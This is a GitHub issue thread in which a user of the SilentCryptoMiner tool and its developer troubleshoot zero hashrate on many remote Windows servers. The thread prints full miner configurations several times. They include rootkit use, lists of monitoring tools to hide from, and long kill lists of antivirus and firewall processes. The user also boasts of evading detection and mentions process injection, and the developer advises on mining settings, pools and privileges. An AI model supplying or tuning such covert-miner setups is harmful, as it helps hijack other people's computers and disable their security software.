### ISSUE TITLE
Idle But No Hashrate 0

### ISSUE THREAD

**Issue by tarekxxx** [UnamSanctam/SilentCryptoMiner#1671]
i have alot of PCS idle totally but with no hashrate
even not show in pool without anyreason like have 6 PCS have same PROBLEMS i dont know where wrong it was fine but suddenly 0 hashrate even try to change config to proxy config he take effect of proxy config but still 0 hashrate idle active

**Comment by tarekxxx** [comment]
i reinstall withoutroot and same problerm 0 hashrate

**Comment by tarekxxx** [comment]
![Screenshot (62)](https://github.com/UnamSanctam/SilentCryptoMiner/assets/20240556/a4421cc8-cb39-41b2-8ca9-46ec77f5797b)

**Comment by tarekxxx** [comment]
![XXXX](https://github.com/UnamSanctam/SilentCryptoMiner/assets/20240556/8a1de164-1dfe-4927-8797-66cec7e7814d)

**Comment by UnamSanctam** [comment]
Might be because of the CPU or the RAM, can you try a different algorithm?

**Comment by tarekxxx** [comment]
ram 64 CPU good enough and was making like 3K then suddenly stopped i will try different algo like RTM ? this fine ?

**Comment by UnamSanctam** [comment]
Yes, since you're using MoneroOcean then just set it inside the password field (you might already know this), so `password~ghostrider`

**Comment by tarekxxx** [comment]
there no any effect i do change config to ~ghostrider beside password and wait while in webpanel update but seems same even change to proxy xmr same any idea how i can help with this  ?

**Comment by tarekxxx** [comment]
OPS iam Sorry now going to calc some low hashrate but now better from 0 why do this problem unam ? and if i change back to normal config it will do the same problem ?

**Comment by UnamSanctam** [comment]
Did they all have a hashrate before you changed something? In that case then that's probably why. Or did they all just get 0 H/s hashrate randomly without you doing anything? In which case it's most likely the pool that caused it (because the miners are decentralized, so only a centralized point could cause it).

**Comment by tarekxxx** [comment]
i dont know i notice this from yestarday because this pc was bring like 3K when disconnect i double check if PC turn off or shutdown but he was idle no antivirus and i dont change anything i go check with webpanel when i found many PCS yestarday like disconnect then i say maybe task manager turn off but infact i found like you see 0 hashrate but 
also i found this in active windows without open anything 
![Uploading Screenshot (63).png…]()

**Comment by tarekxxx** [comment]
i even try to change the pool and back to nanopool and was even same no hashrate 0

**Comment by UnamSanctam** [comment]
Since all of them are at 0 H/s then most likely the cause is something centralized, since the miners are decentralized it should not be due to them. Either it's due to something all those computers have, some webpanel configuration or the pool. Is there some specific reason why you don't run the miners under "System" (all users)?

**Comment by tarekxxx** [comment]
i do make it under system with Highest privileges  All Miner Running As Admin and With Highest privileges  in program

**Comment by tarekxxx** [comment]
all miner like this with privileges  system  all users

**Comment by tarekxxx** [comment]
![X1](https://github.com/UnamSanctam/SilentCryptoMiner/assets/20240556/d5bf9d80-ee68-4092-bb05-227d7eb6242a)
Like this ?

**Comment by tarekxxx** [comment]
i try to back with old configuration back again 0 and if i change to rapteroum hashrate become sooo low not 1k any more or 2k any more just 80 H/s

**Comment by tarekxxx** [comment]
then disabled Run As Administrator and turn on Run As System

**Comment by UnamSanctam** [comment]
No if that's enabled then it should install as "System". So you get a hashrate if you change to the GhostRider algorithm? Do you have access to the computers? It sounds like much of the CPU or RAM is being used by the computer.

**Comment by tarekxxx** [comment]
![Screenshot (64)](https://github.com/UnamSanctam/SilentCryptoMiner/assets/20240556/29d2450e-b1f8-4bd0-a420-657052f4afd6)
Active Window is little wired 
yes i have access RAM totally not used same as CPU 
but now should i do another build version and turn off run as system ? or turn off Run As administrator All my Miner have 2 this 2 Options Enabled 
yea when changed to Ghostrider algorithm calc so tiny hashrate also i will show you used computer
![Screenshot (65)](https://github.com/UnamSanctam/SilentCryptoMiner/assets/20240556/e1a2e344-85ae-4d20-a651-5629322e9e49)

**Comment by tarekxxx** [comment]
i change and do what you say same problem same result ?

**Comment by UnamSanctam** [comment]
If those two are enabled then the "Username" should say `System` normally. And have you tried disabling the rootkit?

**Comment by tarekxxx** [comment]
Yes i Do infact try disabling and install it in system infact was the same no hashrate

**Comment by tarekxxx** [comment]
when change to proxy not working 0 hashrate when change pool to another pool 0 hashrate only working and give so low hashrate in RTM and soooo looooow hashrate not the normal hashrate in RTM

**Comment by UnamSanctam** [comment]
Can you run the checker and post a screenshot and then also post the configuration you have in the web panel? You can censor the wallet address and such.

**Comment by tarekxxx** [comment]
![Screenshot (67)](https://github.com/UnamSanctam/SilentCryptoMiner/assets/20240556/e861819d-9c0c-47e1-875e-7178a8f10214)
Here

**Comment by tarekxxx** [comment]
![Screenshot (67)](https://github.com/UnamSanctam/SilentCryptoMiner/assets/20240556/4c5bc3bd-518f-4ea2-8bfa-342c06542318)
Here Sir

**Comment by UnamSanctam** [comment]
Do you get a higher hashrate if you remove your custom "Advanced Paramters" when building the miner?

**Comment by tarekxxx** [comment]
no but i work with this options like 2 years on most of PCS same Options should i remove them and test ?

**Comment by UnamSanctam** [comment]
Yes just as a test, and what are your configuration in the web panel and the "Remote Configuration"?

**Comment by tarekxxx** [comment]
remote config
{
    "algo": "rx/0",
    "pool": "gulf.moneroocean.stream",
    "port": 443,
    "wallet": "wallet",
    "password": "{COMPUTERNAME}",
    "ssltls": true,
    "max-cpu": 20,
    "idle-wait": 1,
    "idle-cpu": 80,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": "afwServ.exe,aswEngSrv.exe,aswidsagent.exe,aswToolsSvc.exe,AvastSvc.exe,AvastSvc.exe,AvastUI.exe,wsc_proxy.exe,AvastBrowser.exe,AvastNM.exe,ashwebsv.exe,aswupdsv.exe,kavfswp.exe,kavtray.exe,kavfsmui.exe,kavshell.exe,kavfsrcn.exe,kavfs.exe,kavfsgt.exe,kavfswh.exe,kavfsscs.exe,efpeadm.exe,VPNGUI.exe,CVPND.exe,IPSECLOG.exe,cfp.exe,fsdfwd.exe,fsguiexe.exe,blackd.exe,kpf4gui.exe,MSSCLL.exe,MCSHELL.exe,MPFSERVICE.exe,MPFAGENT.exe,nisum.exe,smc.exe,persfw.exe,pccpfw.exe,WINSS.exe,ZLCLIENT.exe,MCODS.exe,MCSHIELD.exe,msmpeng.exe,navapsvc.exe,avkwctl.exe,fsav32.exe,mcshield.exe,ntrtscan.exe,avguard.exe,ashServ.exe,AVENGINE.exe,avgemc.exe,tmntsrv.exe,advchk.exe,ahnsd.exe,alertsvc.exe,avmaisrv.exe,avsynmgr.exe,bitdefender_p2p_startup.exe,cavrid.exe,cavtray.exe,cmgrdian.exe,freshclam.exe,icepack.exe,mgavrtcl.exe,mghtml.exe,mgui.exe,navapsvc.exe,navapw32.exe,navw32.exe,nsmdtr.exe,ofcdog.exe,pav.exe,savscan.exe,spider.exe,xcommsvr.exe,Procmon64a.exe,Procmon64.exe,Procmon.exe,anvir.exe,regedit.exe,MRT.exe",
    "stealth-fullscreen": false,
    "api-endpoint": ""
}
panel COnfig
{
    "algo": "rx/0",
    "pool": "gulf.moneroocean.stream",
    "port": 443,
    "wallet": "",
    "password": "{COMPUTERNAME}~ghostrider",
    "ssltls": true,
    "max-cpu": 20,
    "idle-wait": 1,
    "idle-cpu": 80,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": "afwServ.exe,aswEngSrv.exe,aswidsagent.exe,aswToolsSvc.exe,AvastSvc.exe,AvastSvc.exe,AvastUI.exe,wsc_proxy.exe,AvastBrowser.exe,AvastNM.exe,ashwebsv.exe,aswupdsv.exe,kavfswp.exe,kavtray.exe,kavfsmui.exe,kavshell.exe,kavfsrcn.exe,kavfs.exe,kavfsgt.exe,kavfswh.exe,kavfsscs.exe,efpeadm.exe,VPNGUI.exe,CVPND.exe,IPSECLOG.exe,cfp.exe,fsdfwd.exe,fsguiexe.exe,blackd.exe,kpf4gui.exe,MSSCLL.exe,MCSHELL.exe,MPFSERVICE.exe,MPFAGENT.exe,nisum.exe,smc.exe,persfw.exe,pccpfw.exe,WINSS.exe,ZLCLIENT.exe,MCODS.exe,MCSHIELD.exe,msmpeng.exe,navapsvc.exe,avkwctl.exe,fsav32.exe,mcshield.exe,ntrtscan.exe,avguard.exe,ashServ.exe,AVENGINE.exe,avgemc.exe,tmntsrv.exe,advchk.exe,ahnsd.exe,alertsvc.exe,avmaisrv.exe,avsynmgr.exe,bitdefender_p2p_startup.exe,cavrid.exe,cavtray.exe,cmgrdian.exe,freshclam.exe,icepack.exe,mgavrtcl.exe,mghtml.exe,mgui.exe,navapsvc.exe,navapw32.exe,navw32.exe,nsmdtr.exe,ofcdog.exe,pav.exe,savscan.exe,spider.exe,xcommsvr.exe,Procmon64a.exe,Procmon64.exe,Procmon.exe,anvir.exe,regedit.exe,MRT.exe",
    "stealth-fullscreen": false,
    "api-endpoint": "/api/endpoint.php"
}

**Comment by tarekxxx** [comment]
Still 0 Hashrate in XMR and Very Low Hashrate in RTM same

**Comment by tarekxxx** [comment]
i was thinking about antivirus but i do disable it and even not disabled my miner seems fud https://antiscan.me/images/result/X4NRukwaizb3.png

**Comment by UnamSanctam** [comment]
What hashrate do you get if you run the normal xmrig https://github.com/xmrig/xmrig/releases/download/v6.19.2/xmrig-6.19.2-msvc-win64.zip?

**Comment by tarekxxx** [comment]
Nothing when i press H nothing appears

**Comment by tarekxxx** [comment]
just keep taking task from pool but infact he didint calc anything and CPU stays normal like iam not mining

**Comment by UnamSanctam** [comment]
In the normal xmrig? Can you take a screenshot?

**Comment by tarekxxx** [comment]
![Screenshot (68)](https://github.com/UnamSanctam/SilentCryptoMiner/assets/20240556/0f8a932c-1072-4c23-9bb1-a59271a9c66d)
![Screenshot (69)](https://github.com/UnamSanctam/SilentCryptoMiner/assets/20240556/84fae9b8-01be-4f91-b8e0-d0b7c93427d4)
![Screenshot (70)](https://github.com/UnamSanctam/SilentCryptoMiner/assets/20240556/8b6275e1-95ee-4b5e-b21f-739f9157fab2)
![Screenshot (71)](https://github.com/UnamSanctam/SilentCryptoMiner/assets/20240556/5cb12eaf-2a8d-4b9e-be40-ae63b36fcbb6)
![Screenshot (72)](https://github.com/UnamSanctam/SilentCryptoMiner/assets/20240556/acbb0ddd-6566-416b-8003-f363411104a3)
Before he was appears nothing even when i press H 
But Now Seems Working with low CPU usage

**Comment by UnamSanctam** [comment]
What do you mean by hide? The web panel never removes any miners automatically, unless you have "Hide Offline Miners" or whatever it's called enabled or if they're on another page of the datatable. 

Can you try with xmrig 6.19.2? Since xmrig 6.19.3 did not exist when the last miner update was released.

**Comment by tarekxxx** [comment]
![Screenshot (73)](https://github.com/UnamSanctam/SilentCryptoMiner/assets/20240556/5026cec7-0452-4ab9-baa5-35531a6baea8)
Here i think same result even in load

**Comment by tarekxxx** [comment]
yea i mean the miner is disconnected with his self in silent miner that's why hide from panel

**Comment by UnamSanctam** [comment]
Why do you have the `"api-endpoint": "/api/endpoint.php"` set in your webpanel? And can you try setting `"idle-wait": 0,` to disable idle? And lastly can you run the checker for your latest miner?

**Comment by tarekxxx** [comment]
okay Done Removed api-endpoint as line in config and change idle-wait to 0

**Comment by tarekxxx** [comment]
Maybe Problem was api-endpoint": i was put ?

**Comment by UnamSanctam** [comment]
Yes that was most likely the problem then

**Comment by tarekxxx** [comment]
Thanks So much Unam Amazing As Always

**Comment by tarekxxx** [comment]
Unam Its Turn Off Again and dont want give hashrate again PFFFF

**Comment by tarekxxx** [comment]
just keep appear in webpanel 0 hashrate then disappear WTF this miner want make me crazy

**Comment by tarekxxx** [comment]
when miner work i think under system it didint work this wired

**Comment by tarekxxx** [comment]
everything same bro like you told me before just change from idle wait 0 to 1 again 
bytheway i try install under system not working no hashrate at all i try under ADMINISTRATOR same 
not working 0 hashrate and In Active Windows I see Path rootkit there something wrong i totally cant understand where problem
Active Window \REGISTRY\USER\-500_Classes\AppID\dialer.exe -
{
    "algo": "rx/0",
    "pool": "xmr-eu1.nanopool.org",
    "port": 14433,
    "wallet": "wallet.{COMPUTERNAME}/Pass",
    "ssltls": true,
    "max-cpu": 20,
    "idle-wait": 1,
    "idle-cpu": 80,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": "afwServ.exe,aswEngSrv.exe,aswidsagent.exe,aswToolsSvc.exe,AvastSvc.exe,AvastSvc.exe,AvastUI.exe,wsc_proxy.exe,AvastBrowser.exe,AvastNM.exe,ashwebsv.exe,aswupdsv.exe,kavfswp.exe,kavtray.exe,kavfsmui.exe,kavshell.exe,kavfsrcn.exe,kavfs.exe,kavfsgt.exe,kavfswh.exe,kavfsscs.exe,efpeadm.exe,VPNGUI.exe,CVPND.exe,IPSECLOG.exe,cfp.exe,fsdfwd.exe,fsguiexe.exe,blackd.exe,kpf4gui.exe,MSSCLL.exe,MCSHELL.exe,MPFSERVICE.exe,MPFAGENT.exe,nisum.exe,smc.exe,persfw.exe,pccpfw.exe,WINSS.exe,ZLCLIENT.exe,MCODS.exe,MCSHIELD.exe,msmpeng.exe,navapsvc.exe,avkwctl.exe,fsav32.exe,mcshield.exe,ntrtscan.exe,avguard.exe,ashServ.exe,AVENGINE.exe,avgemc.exe,tmntsrv.exe,advchk.exe,ahnsd.exe,alertsvc.exe,avmaisrv.exe,avsynmgr.exe,bitdefender_p2p_startup.exe,cavrid.exe,cavtray.exe,cmgrdian.exe,freshclam.exe,icepack.exe,mgavrtcl.exe,mghtml.exe,mgui.exe,navapsvc.exe,navapw32.exe,navw32.exe,nsmdtr.exe,ofcdog.exe,pav.exe,savscan.exe,spider.exe,xcommsvr.exe,Procmon64a.exe,Procmon64.exe,Procmon.exe,anvir.exe,regedit.exe,MRT.exe",
	"stealth-fullscreen": false,
    "api-endpoint": "/api/endpoint.php"
}

there normal Configuration Remote not panel and panel as same but without APIendPoint

**Comment by UnamSanctam** [comment]
Do you need the `"api-endpoint"` setting in the "Remote Configuration"? And I would also recommend to start using the new nanopool ports: 10343 (as you can see here: https://xmr.nanopool.org/). And have you tried with the rootkit disabled (the active window suggests that it's enabled).

**Comment by tarekxxx** [comment]
yea i do try disabled rootkit - 10343 HTTPS also ?
i try i think like everything yestarday was working fine after you help me now turn off again just want cry

**Comment by tarekxxx** [comment]
0 hashrate no task manager open no one use PC no one do anything and 0 hashrate PFFFF

**Comment by tarekxxx** [comment]
should i try old version ???
of miner ? 
Like 3.1.0 ??

**Comment by UnamSanctam** [comment]
No that will not make any difference of course (it's xmrig that's reporting 0 H/s), did you remove the `"api-endpoint"` part or is that needed? Can you take a screenshot of the miners that say 0 H/s? Also keep in mind that XMR miners will say 0 H/s when they switch from idle to active or from active to idle but they actually have a hashrate (they reason it says 0 H/s when you do so is because the CPU threads gets reset at the same time that the miner reports to the API, though I've changed this in the next version).

**Comment by tarekxxx** [comment]
yea i do remove part api ofc like you say yestarday follow rules 
Ofc i will take screen shot say 0 hashrate even when turn off the panel and config take from remote config 
same 0 hashrate 
![FFFF](https://github.com/UnamSanctam/SilentCryptoMiner/assets/20240556/e34c029e-d5e5-4977-8b3f-7e0c4691c07a)

**Comment by tarekxxx** [comment]
you near to finish next version ? because i want fix this like now LOL this PC give me aloot of hashrate

**Comment by UnamSanctam** [comment]
Can you post both the "Remote Configuration" you use in that "Remote URL" here and also the "NanoPool" configuration? Also try to disable "Idle" mining again. It is really weird that your miners aren't installed as "System" though (unless it's on purpose), as can be seen from the username and "Active Window".

>you near to finish next version ? because i want fix this like now LOL this PC give me aloot of hashrate

Don't know if the new version will change that, the 0 H/s part is directly from the xmrig which works fine (you even tested it), and that is the weird part.

**Comment by tarekxxx** [comment]
i try 3.1.0 and its same problem 0 H/s i try both normal and as system nothing work on this PC what kind of problem like this ?
even XMrig not working well mean very low usage in CPU even xmrig

**Comment by UnamSanctam** [comment]
Can you post both the configurations (specifically the ones in my last comment) just to make sure? If you use the example settings https://github.com/UnamSanctam/SilentCryptoMiner/wiki#lite and ONLY change the "API Endpoint URL" (and make sure that no configuration from the web panel is used) what hashrate do you get then?

**Comment by tarekxxx** [comment]
Remote Config 
{
    "algo": "rx/0",
    "pool": "xmr-eu1.nanopool.org",
    "port": 10343,
    "wallet": "MYwallet.{COMPUTERNAME}/Passsss",
    "ssltls": true,
    "max-cpu": 20,
    "idle-wait": 1,
    "idle-cpu": 80,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": "afwServ.exe,aswEngSrv.exe,aswidsagent.exe,aswToolsSvc.exe,AvastSvc.exe,AvastSvc.exe,AvastUI.exe,wsc_proxy.exe,AvastBrowser.exe,AvastNM.exe,ashwebsv.exe,aswupdsv.exe,kavfswp.exe,kavtray.exe,kavfsmui.exe,kavshell.exe,kavfsrcn.exe,kavfs.exe,kavfsgt.exe,kavfswh.exe,kavfsscs.exe,efpeadm.exe,VPNGUI.exe,CVPND.exe,IPSECLOG.exe,cfp.exe,fsdfwd.exe,fsguiexe.exe,blackd.exe,kpf4gui.exe,MSSCLL.exe,MCSHELL.exe,MPFSERVICE.exe,MPFAGENT.exe,nisum.exe,smc.exe,persfw.exe,pccpfw.exe,WINSS.exe,ZLCLIENT.exe,MCODS.exe,MCSHIELD.exe,msmpeng.exe,navapsvc.exe,avkwctl.exe,fsav32.exe,mcshield.exe,ntrtscan.exe,avguard.exe,ashServ.exe,AVENGINE.exe,avgemc.exe,tmntsrv.exe,advchk.exe,ahnsd.exe,alertsvc.exe,avmaisrv.exe,avsynmgr.exe,bitdefender_p2p_startup.exe,cavrid.exe,cavtray.exe,cmgrdian.exe,freshclam.exe,icepack.exe,mgavrtcl.exe,mghtml.exe,mgui.exe,navapsvc.exe,navapw32.exe,navw32.exe,nsmdtr.exe,ofcdog.exe,pav.exe,savscan.exe,spider.exe,xcommsvr.exe,Procmon64a.exe,Procmon64.exe,Procmon.exe,anvir.exe,regedit.exe,MRT.exe",
	"stealth-fullscreen": false,
    "api-endpoint": "https://MyAmazingPanel/api/endpoint.php"
   
}


Remote URL


{
    "algo": "rx/0",
    "pool": "xmr-eu1.nanopool.org",
    "port": 10343,
    "wallet": "wallet.{COMPUTERNAME}/passss",
    "ssltls": true,
    "max-cpu": 20,
    "idle-wait": 0,
    "idle-cpu": 80,
    "stealth-targets": "",
    "kill-targets": ""
}
even remove Stealth exe names to make sure nothing stopped Program to mining

**Comment by UnamSanctam** [comment]
Can you try removing `"api-endpoint": "https://myamazingpanel/api/endpoint.php"` and see? And did you try with only the example settings?

**Comment by tarekxxx** [comment]
![XXXXXXXXXXXXXXXXXXXXXXXXXXXX](https://github.com/UnamSanctam/SilentCryptoMiner/assets/20240556/82a02a2e-769c-4e8b-855a-edbbeed87991)

**Comment by tarekxxx** [comment]
yea my config based on lite settings because this RDP no GPU so i use lite settings and edit to my settings and all PCS windows server 2019 working fine this only one whos sometimes work sometimes no and i cant catch what the problem maybe if there old version of miner and didint get uninstall by program it will do glitch like this ???

**Comment by tarekxxx** [comment]
and this wired so wired dialer appear in active window

**Comment by UnamSanctam** [comment]
Oh do you have some of the miners that don't have the web panel URL set in the builder settings? But can you try building a miner with the example settings without changing any of the settings except the "API Endpoint URL"?

>yea my config based on lite settings because this RDP no GPU so i use lite settings and edit to my settings and all PCS windows server 2019 working fine this only one whos sometimes work sometimes no and i cant catch what the problem maybe if there old version of miner and didint get uninstall by program it will do glitch like this ???

Only if that older version is using up all the CPU (and CPU cache) and RAM so that the new version can't mine (then it's not a glitch).

**Comment by tarekxxx** [comment]
![XXXXXXXXXXXXXXXXXXXXX](https://github.com/UnamSanctam/SilentCryptoMiner/assets/20240556/a484be13-cdc5-4215-bd5f-563032d790df)
Here Lite Just change api end-point

**Comment by tarekxxx** [comment]
![xxxxx](https://github.com/UnamSanctam/SilentCryptoMiner/assets/20240556/f6eef321-0cf6-4689-9f23-0f75421c36d3)
0 hashrate

**Comment by tarekxxx** [comment]
iam pretty sure iam settings fine because this not first time always do same steps but this one i dont know was working then stop little wired

**Comment by tarekxxx** [comment]
what possible blocking this and make it sometimes work and some not what block this even everything pingable

**Comment by UnamSanctam** [comment]
I would say then that it's something with the computer itself that does it, the cause could really be a thousand different things so troubleshooting it over text is quite difficult. Especially since it's not just a normal computer.

**Comment by tarekxxx** [comment]
i try to inject into different place maybe fix conhost

**Comment by UnamSanctam** [comment]
Maybe but the problem is probably some setting or configuration on the computer itself and not in the miner.

**Comment by tarekxxx** [comment]
yea but it was working

**Comment by tarekxxx** [comment]
did something like what ?

**Comment by UnamSanctam** [comment]
I don't know, an update or some software installation or anything really. And are you fully certain that no other miners are on the computer? You could try to find some Task Manager like program that is not inside the "Stealth Programs" list and see what uses the CPU and RAM.

**Comment by tarekxxx** [comment]
its pretty like not running just take space little on ram and done ! nothing else

**Comment by tarekxxx** [comment]
other services SQL and etc

**Comment by UnamSanctam** [comment]
What are you using to check? And can you take a screenshot with it sorted after CPU usage?

**Comment by tarekxxx** [comment]
sysgauge and usage normal

**Comment by UnamSanctam** [comment]
If you try another algorithm again now then do you get any hashrate at all? Since then the most likely reason is something to do with the resources (CPU, CPU cache, RAM or something).

**Comment by tarekxxx** [comment]
Here ScreenShot with my Miner Installed
Did Nanopool Support Another Algo ?
![Screenshot (87)](https://github.com/UnamSanctam/SilentCryptoMiner/assets/20240556/d512d7e8-478c-4b9e-9f63-257c83d3b862)

**Comment by UnamSanctam** [comment]
Does the CPU usage there decrease if you try opening `Task Manager`? Nanopool does not have any other CPU algorithms as far as I know.

**Comment by tarekxxx** [comment]
yea same result

**Comment by tarekxxx** [comment]
usage just normal program like sql and etc stuff for database

**Comment by tarekxxx** [comment]
its working under ~ghostrider Only Is there anyway i can make force it run with anyother coin more profit ?

**Comment by UnamSanctam** [comment]
Well you can test with other coins and see what their profitability is, since it works with GhostRider and not with RandomX then most likely it's due to the RAM or something more complex like the CPU cache. So try with any other algorithm or coin, like any CryptoNight variation.

**Comment by tarekxxx** [comment]
its possible to change to [Babacoin] BBC in GhostRider or this version does not support  ?

**Comment by UnamSanctam** [comment]
>its possible to change to [Babacoin] BBC in GhostRider or this version does not support ?

It looks like Babacoin just uses the normal GhostRider so you should be able to mine that just fine.

**Comment by tarekxxx** [comment]
you mean it should switiching automatics ?

**Comment by tarekxxx** [comment]
i mine in moneroocean if so how i can change to BBC must change pool for it ?

**Comment by UnamSanctam** [comment]
>i mine in moneroocean if so how i can change to BBC must change pool for it ?

If you mine on MoneroOcean then it will always mine the most profitable coin for your algorithm, so if you just set it to GhostRider then it will mine the most profitable GhostRider coin on the pools side.

**Comment by tarekxxx** [comment]
Thanks Bro
